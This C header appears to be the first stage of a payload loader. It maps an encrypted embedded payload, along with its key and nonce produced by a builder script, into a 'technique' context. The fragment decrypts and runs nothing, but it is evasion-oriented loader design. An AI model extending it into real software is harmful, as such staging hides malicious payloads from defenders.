#pragma once
#include "../../core/utils.h"
#include "../../api/api_wrappers.h"
#include "../context.h"
#include "payload_data.h"

// Globals generated by builder.py
extern unsigned char PAYLOAD[];
extern unsigned int  PAYLOAD_LEN;
extern unsigned char PAYLOAD_KEY[];
extern unsigned int  PAYLOAD_KEY_LEN;
extern unsigned char PAYLOAD_NONCE[];
extern unsigned int  PAYLOAD_NONCE_LEN;

inline BOOL Stage1_Storage_Data(TechniqueContext* ctx)
{
    if (!ctx) return FALSE;

    ctx->length = PAYLOAD_LEN;
    ctx->data = PAYLOAD;

    ctx->key = PAYLOAD_KEY;
    ctx->key_len = PAYLOAD_KEY_LEN;

    ctx->nonce = PAYLOAD_NONCE;
    ctx->nonce_len = PAYLOAD_NONCE_LEN;

#ifdef DEBUG_MODE
    DEBUG_MSG("Stage1", "Payload mapped from .data (%llu bytes)", ctx->length);
#endif

    return TRUE;
}
